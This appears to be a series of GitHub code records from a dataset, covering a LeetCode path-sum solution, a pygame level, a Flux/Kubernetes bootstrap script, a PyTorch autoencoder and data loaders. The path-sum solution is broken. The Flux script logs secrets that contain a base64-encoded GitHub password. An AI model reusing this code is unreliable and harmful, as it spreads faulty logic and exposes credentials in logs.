bool布尔型\n#\nclass Solution:\n def hasPathSum(self , root: TreeNode, sum: int) -> bool:\n data=self.dfstravel(root)\n print(data)\n if root is not None and sum==root.val:\n if root.left==None and root.right==None:\n return True\n else:\n return False\n if sum in data:\n return True\n else:\n return False\n \n def dfstravel(self, root:TreeNode)->list[int]:\n # write code here\n result=[]\n if root==None:\n return []\n if(root.left==None and root.right==None):\n result.append(root.val)\n return result\n end=[]\n temp=self.dfstravel(root.left)\n for i in range(len(temp)):\n # end.append(i)\n 
temp[i]+=root.val\n # i+=root.val\n data1=temp\n\n end=[]\n temp=self.dfstravel(root.right)\n for i in temp:\n end.append(i)\n data2=root.val+sum(end)\n result.append(data1)\n result.append(data2)\n return result\n# {0,2,8,-2},0\n\nif __name__==\"__main__\":\n root=TreeNode(0)\n root.left=TreeNode(2)\n root.right=TreeNode(8)\n root.left.left=TreeNode(-2)\n sl =Solution()\n sl.hasPathSum(root,0)","repo_name":"yuhanghuang/algorithm_repo","sub_path":"LeetCode/7_18_hasPathSum.py","file_name":"7_18_hasPathSum.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23567818261","text":"import pygame \nfrom settings import *\nfrom tile import Tile\nfrom player import Player\nfrom debug import debug\nfrom support import *\nfrom random import choice\nfrom pnj import *\nfrom quest import *\n\nclass Level:\n\tdef __init__(self):\n\n\t\t# get the display surface \n\t\tself.display_surface = pygame.display.get_surface()\n\n\t\t# sprite group setup\n\t\tself.visible_sprites = YSortCameraGroup()\n\t\tself.obstacle_sprites = pygame.sprite.Group()\n\n\t\t# sprite setup\n\t\tself.create_map()\n\n\tdef create_map(self):\n\t\tlayouts = {\n\t\t\t'boundary' : import_csv_layout('map/map_FloorBlocks_FloorBlocks.csv'),\n\t\t\t'objects' : import_csv_layout('map/map_FloorBlocks_Objects.csv'),\n \t\t\t'entite' : import_csv_layout('map/map_FloorBlocks_entites.csv')\n\t\t}\n \n\t\tgraphics = {\n\t\t\t'object' : import_folder('graphics/objects')\n\t\t}\n \n\t\tvide = pygame.image.load('graphics/vide.png')\n\t\tfor style,layout in layouts.items():\n\t\t\tfor row_index, row in enumerate(layout):\n\t\t\t\tfor col_index, col in enumerate(row):\n\t\t\t\t\tif col != '-1':\n\t\t\t\t\t\tx = col_index * TILESIZE\n\t\t\t\t\t\ty = row_index * TILESIZE\n\t\t\t\t\t\tif style == 'boundary':\n\t\t\t\t\t\t\tTile((x,y),[self.visible_sprites,self.obstacle_sprites],'invisible',vide)\n\t\t\t\t\t\tif style == 'objects':\n\t\t\t\t\t\t\tsurf = graphics['object'][int(col)]\n\t\t\t\t\t\t\tTile((x,y),[self.visible_sprites,self.obstacle_sprites],'objects',surf)\n\t\t\t\t\t\tif style == 'entite':\n\t\t\t\t\t\t\tif col == 'p':\n\t\t\t\t\t\t\t\tself.player = Player((x,y),[self.visible_sprites],self.obstacle_sprites)\n\t\t\t\t\t\t\tif col == 'm':\n\t\t\t\t\t\t\t\tPnj('Marie',(x,y),[self.visible_sprites],True,self.obstacle_sprites)\n\t\t\t\t\t\t\tif col == 'a':\n\t\t\t\t\t\t\t\tPnj('Alberta',(x,y),[self.visible_sprites],True,self.obstacle_sprites)\n \n\tdef run(self):\n\t\t# update and draw the game\n\t\tself.visible_sprites.custom_draw(self.player)\n\t\tself.visible_sprites.update()\n\t\tself.visible_sprites.pnj_update(self.player)\n\nclass YSortCameraGroup(pygame.sprite.Group):\n\tdef __init__(self):\n\n\t\t# general setup \n\t\tsuper().__init__()\n\t\tself.display_surface = pygame.display.get_surface()\n\t\tself.half_width = self.display_surface.get_size()[0] // 2\n\t\tself.half_height = self.display_surface.get_size()[1] // 2\n\t\tself.offset = pygame.math.Vector2()\n\n\t\t# creating the floor\n\t\tself.floor_surf = pygame.image.load('graphics/tilemap/ground.png').convert()\n\t\tself.floor_rect = self.floor_surf.get_rect(topleft = (-960,-1600))\n\n\tdef custom_draw(self,player):\n\n\t\t# getting the offset \n\t\tself.offset.x = player.rect.centerx - self.half_width\n\t\tself.offset.y = player.rect.centery - self.half_height\n\n\t\t# drawing the floor\n\t\tfloor_offset_pos = self.floor_rect.topleft - 
self.offset\n\t\tself.display_surface.blit(self.floor_surf,floor_offset_pos)\n\n\t\t# for sprite in self.sprites():\n\t\tfor sprite in sorted(self.sprites(),key = lambda sprite: sprite.rect.centery):\n\t\t\toffset_pos = sprite.rect.topleft - self.offset\n\t\t\tself.display_surface.blit(sprite.image,offset_pos)\n\n\tdef pnj_update(self,player):\n\t\tpnj_sprites = [sprite for sprite in self.sprites() if hasattr(sprite,'sprite_type') and sprite.sprite_type == 'pnj']\n\t\tfor pnj in pnj_sprites:\n\t\t\tpnj.pnj_update(player)","repo_name":"DorineMaillet/CellAttack","sub_path":"game/code/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70523834485","text":"#random function in python\r\n#importing(extract) module(random) and variables(pi) or function \"from\" module\r\n#modules are .py files\r\n\r\nimport random\r\nfrom math import pi, sqrt as haha #sqrt is an function /import multiple objects /change func name 'as' keyword\r\n\r\nm=0\r\ns=round(pi,2)\r\na=float(input(\"Enter pi to two decimals : \"))\r\n\r\nif a==s :\r\n for i in range(10):\r\n x=random.randint(1,3) #(start,end)\r\n a=int(input(\"Guess the number : \"))\r\n if a==x :\r\n m+=1\r\n print(\"HUhh!\")\r\n else : print(\"Random number is \",x)\r\n \r\ny=haha(m) #sqrt(m)\r\nprint(\"Your score is \",m)\r\nprint(m,\"squared root is\",y)\r\n","repo_name":"lawun330/Python_Basics","sub_path":"magic numbers.py","file_name":"magic numbers.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"24726732198","text":"import argparse\nimport os\nimport json\nimport base64\nimport pathlib\n\nfrom kubernetes import client, utils\nfrom kubernetes.client import Configuration, ApiClient\nfrom pyrage import x25519\nfrom termcolor import colored\n\nfrom core.base_configuration import BaseConfiguration\nfrom core.run_context import run\n\nAGE_PUBLIC_KEY_FILE = (pathlib.Path(\n __file__).parent.parent / \"age.pubkey\").resolve()\n\n\nclass ClusterConfiguration(BaseConfiguration):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n\n self.steps = [\n self.create_flux_system_namespace,\n self.setup_age_secret,\n self.setup_github_secret,\n\n ]\n\n def create_flux_system_namespace(self, log_prefix: str | None = None, **kwargs):\n all_namespaces = self.v1.list_namespace()\n if \"flux-system\" in [ns.metadata.name for ns in all_namespaces.items]:\n self.log(log_prefix, colored(\n \"flux-system namespace already exists\", \"yellow\"))\n return\n self.log(log_prefix, \"Creating flux-system namespace\")\n self.v1.create_namespace(body={\"metadata\": {\"name\": \"flux-system\"}})\n\n def setup_age_secret(self, log_prefix: str | None = None, **kwargs):\n # get the current secrets\n current_secrets = self.v1.list_namespaced_secret(\n namespace=\"flux-system\")\n # check if the secret already exists\n if \"sops-age\" in [secret.metadata.name for secret in current_secrets.items]:\n if not kwargs.get(\"force_age_secret\", False):\n self.log(log_prefix, colored(\n \"Age secret already exists, skipping\", \"blue\"))\n return\n self.log(\n log_prefix,\n colored(\n \"Age secret already exists, but force_age_secret is set to True, recreating\", \"yellow\"),\n )\n self.log(log_prefix, colored(\n \"Deleting existing age secret\", \"red\"))\n self.v1.delete_namespaced_secret(\n name=\"sops-age\", namespace=\"flux-system\")\n # 
create the secret\n self.age_id = x25519.Identity.generate()\n self.age_pubkey = str(self.age_id.to_public())\n self.age_privkey = str(self.age_id)\n secret = {\n \"kind\": \"Secret\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"sops-age\",\n \"namespace\": \"flux-system\",\n },\n \"data\": {\n \"age.agekey\": base64.b64encode(self.age_privkey.encode()).decode()\n },\n }\n self.log(log_prefix, \"Creating secret\", json.dumps(secret, indent=4))\n self.v1.create_namespaced_secret(namespace=\"flux-system\", body=secret)\n with open(AGE_PUBLIC_KEY_FILE, \"w\") as f:\n self.log(log_prefix, f\"Writing age public key to\", colored(\n AGE_PUBLIC_KEY_FILE, \"green\", attrs=[\"bold\"]))\n f.write(self.age_pubkey)\n\n def setup_github_secret(self, log_prefix: str | None = None, **kwargs):\n # get the current secrets\n current_secrets = self.v1.list_namespaced_secret(\n namespace=\"flux-system\")\n # check if the secret already exists\n if \"github-flux-auth\" in [secret.metadata.name for secret in current_secrets.items]:\n if not kwargs.get(\"force_github_secret\", False):\n self.log(log_prefix, colored(\n \"Github secret already exists, skipping\", \"blue\"))\n return\n self.log(\n log_prefix,\n colored(\n \"Github secret already exists, but force_github_secret is set to True, recreating\", \"yellow\"),\n )\n self.log(log_prefix, colored(\n \"Deleting existing github secret\", \"red\"))\n self.v1.delete_namespaced_secret(\n name=\"github-flux-auth\", namespace=\"flux-system\")\n # create the secret\n gh_user = kwargs.get(\"gh_user\")\n if not gh_user:\n self.log(log_prefix, colored(\n \"No github user provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github user provided. Please provide a github user using the --gh-user flag\")\n gh_password = kwargs.get(\"gh_password\")\n if not gh_password:\n self.log(log_prefix, colored(\n \"No github password provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github password provided. 
Please provide a github password using the --gh-password flag\")\n\n secret = {\n \"kind\": \"Secret\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"github-flux-auth\",\n \"namespace\": \"flux-system\",\n },\n \"data\": {\n \"username\": base64.b64encode(f\"{gh_user}\\n\".encode()).decode(),\n \"password\": base64.b64encode(f\"{gh_password}\\n\".encode()).decode(),\n }\n }\n self.log(log_prefix, \"Creating secret\", json.dumps(secret, indent=4))\n self.v1.create_namespaced_secret(namespace=\"flux-system\", body=secret)\n\n\nclass FluxConfiguration(BaseConfiguration):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.kubeconfig = kwargs.get(\"kube_config\")\n self.cluster_name = kwargs.get(\"cluster_name\")\n self.gh_repo = kwargs.get(\"gh_repo\")\n self.gh_user = kwargs.get(\"gh_user\")\n self.cluster_path = pathlib.Path(\n __file__).parent.parent / \"clusters\" / self.cluster_name\n self.infra_path = self.cluster_path / \"infrastructure.yaml\"\n self.apps_path = self.cluster_path / \"apps.yaml\"\n self.source_path = self.cluster_path / \"source.yaml\"\n self.flux_path = self.cluster_path / \"flux.yaml\"\n\n self.steps = [\n self.check_config,\n self.flux_preflight_check,\n self.generate_flux_source,\n self.install_flux,\n self.install_apps,\n ]\n\n def check_config(self, log_prefix: str | None = None, **kwargs):\n\n if self.kubeconfig is None:\n self.log(self.__class__.__name__, colored(\n \"No kubeconfig provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No kubeconfig provided. Please provide a kubeconfig using the --kube-config flag\")\n self.env = {\"KUBECONFIG\": self.kubeconfig, \"PATH\": os.environ[\"PATH\"]}\n\n if self.gh_repo is None:\n self.log(log_prefix, colored(\n \"No github repo provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github repo provided. Please provide a github repo using the --gh-repo flag\")\n\n if self.gh_user is None:\n self.log(log_prefix, colored(\n \"No github user provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github user provided. Please provide a github user using the --gh-user flag\")\n\n if self.cluster_name is None:\n self.log(log_prefix, colored(\n \"No cluster name provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No cluster name provided. 
Please provide a cluster name using the --cluster-name flag\")\n\n if not self.cluster_path.exists():\n self.log(log_prefix, colored(\n f\"Cluster path {self.cluster_path} does not exist\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n f\"Please ensure you have created a directory for cluster {self.cluster_name} as described in the README and provide a valid cluster name using the --cluster-name flag\")\n\n if not self.infra_path.exists():\n self.log(log_prefix, colored(\n f\"Infrastructure file {self.infra_path} does not exist\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n f\"Please ensure you have created an {self.infra_path} file for cluster {self.cluster_name} as described in the README\")\n\n if not self.apps_path.exists():\n self.log(log_prefix, colored(\n f\"Applications file {self.apps_path} does not exist\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n f\"Please ensure you have created an {self.apps_path} file for cluster {self.cluster_name} as described in the README\")\n\n def flux_preflight_check(self, log_prefix: str | None = None, **kwargs):\n self.run_process([\"flux\", \"check\", \"--pre\"], log_prefix=log_prefix)\n\n def generate_flux_source(self, log_prefix: str | None = None, **kwargs):\n cmd = [\n \"flux\", \"create\", \"source\", \"git\", \"flux-system\",\n \"--url\", self.gh_repo,\n \"--branch\", \"main\",\n \"--interval\", \"1m\",\n \"--export\"\n ]\n repo_name = self.gh_repo.split(\"/\")[-1]\n if self.is_gh_repo_private(self.gh_user, repo_name):\n self.log(log_prefix, colored(\n \"Github repo is private. Will use github-flux-auth secret\", \"yellow\"))\n cmd.extend(\n [\n \"--secret-ref\", \"github-flux-auth\",\n ]\n )\n else:\n self.log(log_prefix, colored(\n \"Github repo is public. 
Will not use github-flux-auth secret or username/password\", \"yellow\"))\n\n code, out, err = self.run_process(cmd, log_prefix=log_prefix)\n\n self.log(log_prefix, colored(\n f\"Writting flux source to {self.source_path}\", \"yellow\", attrs=[\"bold\"]))\n with open(str(self.source_path), \"w\") as f:\n f.write(out)\n\n def install_flux(self, log_prefix: str | None = None, **kwargs):\n code, out, err = self.run_process([\"flux\", \"install\", \"--export\",\n f\"{self.flux_path}\"], log_prefix=log_prefix)\n self.log(log_prefix, f\"Writing Flux CRDs to {self.flux_path}\")\n with open(str(self.flux_path), \"w\") as f:\n f.write(out)\n self.log(log_prefix, colored(\n f\"Flux installed, please check {self.flux_path} for any errors\", \"green\", attrs=[\"bold\"]))\n self.log(log_prefix, colored(\n f\"Executing `kubectl apply -f {self.flux_path} to install flux\", \"green\", attrs=[\"bold\"]))\n try:\n utils.create_from_yaml(self.api_client, str(\n self.flux_path), namespace=\"flux-system\")\n except utils.FailToCreateError as e:\n self.log_k8s_api_error(log_prefix, e)\n\n def install_apps(self, log_prefix: str | None = None, **kwargs):\n self.log(log_prefix, colored(\n f\"Setting up GitReposority/flux-system from {self.source_path}\", \"green\", attrs=[\"bold\"]))\n self.run_process(\n [\"kubectl\", \"apply\", \"-f\", str(self.source_path)], log_prefix=log_prefix)\n\n self.log(log_prefix, colored(\n f\"Setting up Infrastructure from {self.infra_path}\", \"green\", attrs=[\"bold\"]))\n self.run_process(\n [\"kubectl\", \"apply\", \"-f\", str(self.infra_path)], log_prefix=log_prefix)\n\n self.log(log_prefix,\n colored(f\"Setting up Apps from {self.apps_path}\", \"green\", attrs=[\"bold\"]))\n self.run_process(\n [\"kubectl\", \"apply\", \"-f\", str(self.apps_path)], log_prefix=log_prefix)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Flux configuration\")\n parser.add_argument(\"--kube-config\", type=str,\n help=\"Path to kubeconfig file\")\n parser.add_argument(\n \"--force-age-secret\",\n action=\"store_true\",\n help=\"Force the creation of the age secret\",\n )\n parser.add_argument(\n \"--gh-user\", type=str, help=\"Github user with acccess to this repo\"\n )\n parser.add_argument(\n \"--gh-password\",\n type=str,\n help=\"Github password for the user with acccess to this repo\",\n )\n parser.add_argument(\n '--force-github-secret', action='store_true', help='Force the creation of the github secret'\n )\n parser.add_argument(\n '--cluster-name', type=str, help='Name of the cluster. 
{dev, staging, production}'\n )\n parser.add_argument(\n '--gh-repo', type=str, default=\"https://github.com/maany/flux-play\", help='URL of the github repo containing flux values'\n )\n args = parser.parse_args()\n with run(\n \"kubectl\",\n \"proxy\",\n \"--port=8080\",\n env={\"KUBECONFIG\": args.kube_config, \"PATH\": os.environ[\"PATH\"]},\n ) as proc:\n print(\"Kubectl proxy started\")\n print(\"Waiting for kubectl proxy to start\")\n while True:\n try:\n kubeconfig = Configuration()\n kubeconfig.host = \"http://127.0.0.1:8080\"\n api_client = ApiClient(configuration=kubeconfig)\n kubectl = client.CoreV1Api(api_client=api_client)\n kubectl.list_node()\n print(\"Kubectl proxy is ready\")\n break\n except Exception as e:\n print(\"Kubectl proxy is not ready yet\")\n pass\n\n cluster_config = ClusterConfiguration(\n force_age_secret=args.force_age_secret,\n gh_user=args.gh_user,\n gh_password=args.gh_password,\n force_github_secret=args.force_github_secret,\n )\n cluster_config.run()\n\n flux_config = FluxConfiguration(\n force_age_secret=args.force_age_secret,\n gh_user=args.gh_user,\n gh_password=args.gh_password,\n force_github_secret=args.force_github_secret,\n kube_config=args.kube_config,\n gh_repo=args.gh_repo,\n cluster_name=args.cluster_name\n )\n flux_config.run()\n\n proc.terminate()\n proc.kill()\n","repo_name":"maany/flux-play","sub_path":"scripts/flux_config.py","file_name":"flux_config.py","file_ext":"py","file_size_in_byte":13900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28594965650","text":"from flask_restx import Namespace, Resource, fields\nfrom flask import current_app\n\nendpoint = Namespace(\n 'data-formats-endpoint', description='Data formats related api endpoints'\n)\n\ndata_formats_fields = endpoint.model(\n 'DataFormats', {'data_formats': fields.List(fields.String)}\n)\n\n\n@endpoint.route('/')\n@endpoint.route('')\nclass DataFormats(Resource):\n @endpoint.doc(\n description='List of a allowed data formats',\n responses={400: 'Bad request', 404: 'Not Found',},\n )\n @endpoint.response(200, 'Success - Data Formats fetched', data_formats_fields)\n def get(self):\n return current_app.config['DATA_FORMAT_FILE_EXTENSIONS']\n","repo_name":"ikennaokpala/flask-restful-api-example","sub_path":"src/main/controllers/v1/data_formats_controller.py","file_name":"data_formats_controller.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23047483490","text":"import torch\r\nimport math\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.autograd import Variable\r\nfrom torch import optim, nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nimport autoencoder.networks as nets\r\n\r\n# choose device\r\nUSE_CUDA = torch.cuda.is_available()\r\nif not USE_CUDA:\r\n DEVICE = torch.device('cpu')\r\nelse:\r\n DEVICE = torch.device('cuda:0')\r\nprint(\"CUDA:\", USE_CUDA, DEVICE)\r\n\r\n# the main model to do main process:\r\n# including training, testing, evaluating\r\nclass Model:\r\n def __init__(self, hidden, learning_rate, batch_size, n_time, n_cnt):\r\n self.batch_size = batch_size\r\n self.net = nets.AutoEncoder(hidden)\r\n self.net.to(DEVICE)\r\n self.opt = optim.SGD(self.net.parameters(), learning_rate, momentum=0.9, weight_decay=0.04) # for fine-tone\r\n self.feature_size = hidden[0] # number of features\r\n self.res = np.zeros((n_time, n_cnt, hidden[0]))\r\n\r\n def fill_res(self, tids, 
cids, outputs):\r\n for i in range(tids.shape[0]):\r\n self.res[tids[i], cids[i]] = outputs[i]\r\n\r\n def run(self, trainset, testset, num_epoch):\r\n torch.autograd.set_detect_anomaly(True) # for debug\r\n train_loader = DataLoader(trainset, self.batch_size, shuffle=True, pin_memory=True)\r\n test_loader = DataLoader(testset, self.batch_size, shuffle=False, pin_memory=True)\r\n for epoch in range(1, num_epoch + 1):\r\n #print \"Epoch %d, at %s\" % (epoch, datetime.now())\r\n trn_tid, trn_cid, out_train = self.train(train_loader, epoch)\r\n tst_tid, tst_cid, out_test = self.test(test_loader)\r\n\r\n torch.save(self.net.state_dict(), '../models/autoencoder')\r\n self.fill_res(trn_tid, trn_cid, out_train)\r\n self.fill_res(tst_tid, tst_cid, out_test)\r\n return self.res\r\n\r\n def train(self, train_loader, epoch):\r\n self.net.train()\r\n tids, cids, outputs = [], [], []\r\n for bid, (tid, cid, feature, mask) in enumerate(train_loader):\r\n feature = Variable(feature.float()).to(DEVICE)\r\n mask = Variable(mask).to(DEVICE)\r\n self.opt.zero_grad()\r\n output = self.net(feature)\r\n loss = F.mse_loss(output * mask, feature * mask) # masked parts do not count\r\n\r\n loss.backward()\r\n self.opt.step()\r\n\r\n tids.append(tid.cpu().data.numpy())\r\n cids.append(cid.cpu().data.numpy())\r\n outputs.append(output.cpu().data.numpy())\r\n\r\n tids, cids, outputs = np.concatenate(tids), np.concatenate(cids), np.concatenate(outputs)\r\n print(\"Epoch {}, train end. loss: {}\".format(epoch, loss.cpu().data))\r\n return tids, cids, outputs\r\n\r\n def test(self, test_loader):\r\n self.net.eval()\r\n\r\n rmse = []\r\n tids, cids, outputs = [], [], []\r\n for bid, (tid, cid, feature, mask) in enumerate(test_loader):\r\n features = Variable(feature.float()).to(DEVICE)\r\n masks = Variable(mask).to(DEVICE)\r\n output = self.net(features)\r\n rmse.append(np.sum(((output * masks).cpu().data.numpy() - (features * masks).cpu().data.numpy())**2)**0.5) # masked parts do not count\r\n\r\n tids.append(tid.cpu().data.numpy())\r\n cids.append(cid.cpu().data.numpy())\r\n outputs.append(output.cpu().data.numpy())\r\n\r\n tids, cids, outputs = np.concatenate(tids), np.concatenate(cids), np.concatenate(outputs)\r\n rmse = math.sqrt(sum(rmse) / len(test_loader))\r\n\r\n print(\" Test RMSE = %f\" % rmse)\r\n return tids, cids, outputs","repo_name":"styxsys0927/DA-and-DL-Spring2021","sub_path":"autoencoder/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6970566681","text":"from django.conf.urls import url, include\nfrom . 
import views\n\n# from django.contrib import admin\n\nfrom .views import get_person, get_unit, get_unit_link, get_unit_name, get_unit_regtree, get_unit_globtree\n\nurlpatterns = [\n url(r'^$', views.post_list, name='post_list'),\n # url(r'^admin/', admin.site.urls),\n \n # person\n url(r'^wiwo/person/(?Pu[0-9]{7})/$', get_person),\n # microviews person\n # unit\n url(r'^wiwo/unit/(?P5[0-9]{7})/$', get_unit, name=\"unit\"),\n # microviews unit\n url(r'^wiwo/unit/(?P5[0-9]{7})/link/$', get_unit_link, name=\"unitlink\"),\n url(r'^wiwo/unit/(?P5[0-9]{7})/name/$', get_unit_name, name=\"unitname\"),\n url(r'^wiwo/unit/(?P5[0-9]{7})/regtree/$', get_unit_regtree, name=\"regtree\"),\n url(r'^wiwo/unit/(?P5[0-9]{7})/globtree/$', get_unit_globtree, name=\"globtree\"),\n # url(r'^wiwo/unit/(?P5[0-9]{7})/children/$', get_unit_children)\n]","repo_name":"spereverde/django-kuleuven","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39484957144","text":"from sysu_dataset import SYSU\n\nimport numpy as np\nimport scipy\nimport itertools\nimport cv2\n\nimport torch\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\n\nfrom config import *\n\n\nvox_size=54\nall_tups = np.array(list(itertools.product(range(vox_size), repeat=2)))\nrot_array = np.arange(vox_size*vox_size).reshape([vox_size,vox_size])\nK = 5\nT = 10\n\nclass SYSUdataset(Dataset):\n def __init__(self, test=False, full_train=False):\n # Underlying dataset and features\n self.dataset = SYSU()\n\n # What to return\n self.images = DATA_IMAGES\n self.images_3D = DATA_IMAGES_3D\n self.op_flow = DATA_OP_FLOW\n self.op_flow_2D = DATA_OP_FLOW_2D\n self.single_feature = DATA_SINGLE_FEAT\n self.augmentation = DATA_AUGMENTATION\n\n # Train, validation, test split\n self.train = full_train\n if test:\n self.vid_ids = self.dataset.get_splits(SPLIT_NUMBER)[1]\n else:\n self.vid_ids = self.dataset.get_splits(SPLIT_NUMBER)[0]\n\n def __len__(self):\n return len(self.vid_ids)\n\n def image_transforms(self, numpy_imgs):\n ''' Transformations on a list of images\n\n Returns\n -------\n images : Torch Tensor\n Stacked tensor of all images with the transformations applied\n '''\n\n # Get random parameters to apply same transformation to all images in list\n color_jitter = transforms.ColorJitter.get_params(.25,.25,.25,.25)\n rotation_param = transforms.RandomRotation.get_params((-15,15))\n crop_params = None\n\n # Apply transformations\n images = []\n for numpy_img in numpy_imgs:\n i = transforms.functional.to_pil_image(numpy_img)\n i = transforms.functional.resize(i, (224,224))\n if self.train:\n i = color_jitter(i)\n i = transforms.functional.rotate(i, rotation_param)\n i = transforms.functional.to_tensor(i)\n i = transforms.functional.normalize(i, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n images.append(i)\n return torch.stack(images)\n\n\n\n\n def op_flow_transforms(self, op_flow):\n ''' Transformations on a tensor of optical flow voxel grids\n\n Parameters\n ----------\n op_flow : ndarray\n\n Returns\n -------\n op_flow : Torch Tensor\n A torch tensor of an optical flow voxel grid with the\n transformations (rotation, scale, translation) applied to it\n '''\n def translate(op_flow):\n # op_flow[:,0::3,:,:,:] ---> x axis vectors\n # op_flow = scipy.ndimage.interpolation.shift(op_flow, [0,0,x_move,y_move,z_move], cval=0, order=0) # Slower alternative\n # Get amount to shift\n 
max_shift = int(op_flow.shape[2] * 0.10)\n x_move, y_move, z_move = np.random.randint(-max_shift, max_shift, 3)\n\n # Translate values\n if x_move > 0:\n op_flow[:,:,x_move:,:,:] = op_flow[:,:,:-x_move,:,:]\n op_flow[:,:,:x_move,:,:] = 0\n elif x_move < 0:\n op_flow[:,:,:x_move,:,:] = op_flow[:,:,-x_move:,:,:]\n op_flow[:,:,x_move:,:,:] = 0\n if y_move > 0:\n op_flow[:,:,:,y_move:,:] = op_flow[:,:,:,:-y_move,:]\n op_flow[:,:,:,:y_move,:] = 0\n elif y_move < 0:\n op_flow[:,:,:,:y_move,:] = op_flow[:,:,:,-y_move:,:]\n op_flow[:,:,:,y_move:,:] = 0\n if z_move > 0:\n op_flow[:,:,:,:,z_move:] = op_flow[:,:,:,:,:-z_move]\n op_flow[:,:,:,:,:z_move] = 0\n elif z_move < 0:\n op_flow[:,:,:,:,:z_move] = op_flow[:,:,:,:,-z_move:]\n op_flow[:,:,:,:,z_move:] = 0\n return op_flow\n\n\n def rotate(op_flow):\n ''' Rotate an optical flow tensor a random amount about the y axis '''\n # Get angle\n angle = np.random.randint(-45, 45)\n\n # Rotate positions\n rot_mat = scipy.ndimage.interpolation.rotate(rot_array, angle, (0,1), reshape=False, order=0)\n op_flow_new = np.zeros(op_flow.shape, dtype=np.float32)\n tup = all_tups[rot_mat]\n op_flow_new = op_flow[:,:,tup[:, :, 0],:,tup[:, :, 1]].transpose(2,3,0,4,1)\n\n # Rotate flow vectors\n cos = np.cos(np.radians(-angle))\n sin = np.sin(np.radians(-angle))\n x_copy = op_flow_new[:,0].copy()\n z_copy = op_flow_new[:,2].copy()\n op_flow_new[:,0] = x_copy * cos + z_copy * sin\n op_flow_new[:,2] = x_copy * -sin + z_copy * cos\n\n return op_flow_new\n\n\n def scale(op_flow):\n return op_flow\n\n # import datetime as dt\n if self.train:\n op_flow = translate(op_flow)\n op_flow = rotate(op_flow)\n\n return torch.from_numpy(op_flow)\n\n\n\n\n def get_3D_op_flow(self, vid_id):\n # Load the data\n feat_values = np.load(\"{}/{:05}.npy\".format(CACHE_3D_VOX_FLOW_SYSU, vid_id))\n feat_nonzero = np.load(\"{}/{:05}.nonzeros.npy\".format(CACHE_3D_VOX_FLOW_SYSU, vid_id))\n feat_shape = np.load(\"{}/{:05}.shape.npy\".format(CACHE_3D_VOX_FLOW_SYSU, vid_id))\n\n # Rebuild the feature from the saved data\n feature = np.zeros(feat_shape, np.float32)\n feature[tuple(feat_nonzero)] = feat_values\n\n return feature\n\n\n\n\n def __getitem__(self, idx):\n vid_id = self.vid_ids[idx]\n to_return = []\n\n # Images\n if self.images:\n images = np.load('{}/{:05}.npy'.format(CACHE_2D_IMAGES_SYSU, vid_id))\n images = self.image_transforms(images)\n to_return.append(images)\n\n # Optical flow 3D\n if self.op_flow:\n op_flow = self.get_3D_op_flow(vid_id)\n op_flow = self.op_flow_transforms(op_flow)\n to_return.append(op_flow)\n\n # Labels\n to_return.append(self.dataset.get_label(vid_id))\n\n return to_return\n\n\n\n\n\ndef get_train_loader():\n dataset = SYSUdataset(full_train=True)\n return torch.utils.data.DataLoader(dataset, batch_size=DATA_BATCH_SIZE,\n shuffle=True, num_workers=NUM_WORKERS,\n pin_memory=True)\n\n\n\ndef get_test_loader():\n dataset = SYSUdataset(test=True)\n return torch.utils.data.DataLoader(dataset, batch_size=DATA_BATCH_SIZE,\n shuffle=False, num_workers=NUM_WORKERS,\n pin_memory=True)\n","repo_name":"mpeven/ntu_rgb","sub_path":"datasets_sysu.py","file_name":"datasets_sysu.py","file_ext":"py","file_size_in_byte":6646,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"12090290355","text":"from flask import Flask, jsonify, make_response, request, abort\r\nfrom flask_cors import CORS, cross_origin\r\nfrom training import Agent,TicTacToeGame,demo_game_stats\r\ngameConfig = {\r\n 'level' : 'easy',\r\n}\r\napp = 
